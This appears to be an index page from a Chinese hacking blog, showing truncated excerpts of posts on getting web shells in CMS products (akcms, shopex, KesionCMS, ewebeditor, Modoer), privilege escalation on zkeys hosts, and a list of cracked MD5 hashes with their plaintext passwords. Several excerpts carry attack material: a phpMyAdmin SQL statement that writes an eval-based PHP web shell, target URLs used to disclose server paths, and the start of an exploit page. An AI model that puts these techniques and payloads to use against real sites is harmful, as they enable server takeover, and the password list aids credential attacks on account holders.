akcms 代码执行漏洞

    上周挖出的akcms的后台模版getshell感觉没什么新意,然后又仔细看了看代码,发现了一个比较有“前途”的洞,代码执行漏洞,而且出问题函数是作者提供给建站用户进行二次开发时使用的,也就是说这个问题放大的程度也会要大些。 0x01、原理分析 漏洞问题主要存在于includecommon.func.php文件中的ak_if函数,先看下代码 eval函数参数中的变量$variable未作任何...

- 阅读全文 -

shopex前台普通用户getshell最新漏洞

第一个:想办法找到目标网站的绝对路径 https://www.webshell.cc/install/svinfo.php?phpinfo=true https://www.webshell.cc/core/api/shop_api.php https://www.webshell.cc/core/api/site/2.0/api_b2b_2_0_cat.php http://www.webshell....

- 阅读全文 -

phpmyadmin 导出 shell 至中文路径

set character_set_client='gbk'; set character_set_connection='gbk'; set character_set_database='gbk'; set character_set_results='gbk'; set character_set_server='gbk'; select '<?php eval($_POST[cmd]...

- 阅读全文 -

zkysoft 主机提权方法

  zkeys 默认网站用户权限很低,大部分exp都用不了,如 iis6 exp 就提示无法设置注册表。 提供我成功过的几个方法(不一定有效): 1、如果目标仅仅是旁站的话可以去注册表查 serv-u 的指定用户密码,注册表地址:HKEY_LOCAL_MACHINESOFTWAREcat softserv-u 2、如果要提权的话可以找找有 winwebmail 没,这个东西有的 zkey...

- 阅读全文 -

Modoer Exp

源码: <html> <head> <title> Modoer EXP </title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> </head> <script language="javascript"> fun...

- 阅读全文 -

个人收藏的部分收费MD5!

MD5 HASH 84c45962d887564f a66abb5684c45962d887564f08346e8d admin123456 8a1929f5878b794b fbbf0df68a1929f5878b794bbc290f8e 0523213511 fd51ac9e0f2262e4 8720e806fd51ac9e0f2262e47c4e7ddf 06605528808 353acf...

- 阅读全文 -

问题ewebeditor编辑器突破安全狗

 题目说到了问题和突破,问题的ewebeditor程序,这儿程序问题出来哪儿呢?         1.登陆的地方被删除了,也就是admin_login.asp这个页面被删除了。         2.是post提交好像有问题,不管点击那个提交post都会跳转到登陆页面,但是登陆页面又没有,如果直接访问那个页面,当然也可以访问。     当然上边说到的突破,所谓突破也就是说非常规的环境,非常规的手法去...

- 阅读全文 -

利用后台SQL查询语句拿webshell

今天,朋友给了一个比较好玩的后台   有SQL查询功能     在后台的主页,或者备份什么的,可以得到网站的物理路径,这里我没有传马,直接点击了备份数据库,重点是得到物理路径,后台主页,或者各种爆物理路径,还要看运气和自由发挥了   以下拿webshell步骤   第一句代码   create table cmd (a varchar(5...

- 阅读全文 -

科讯kesioncms 5.5以下漏洞拿shell方法原理总结

讯做为一个强大的cms程序大多被政府和教育机构网站所使用,关于科讯的漏洞利用教程网上不是很多。由于科讯的后台登陆需要输入认证码,而认证码没有保存在数据库而是保存在asp文件中,所以在某种程度上增大了拿shell 的难度。下面就个版本拿shell 的方法做一总结。 KesionCMS V3.x和3.x以下版本 网上有0day工具不过没有具体原理,下面就讲一下手工拿shell的方法 关键字:inurl...

- 阅读全文 -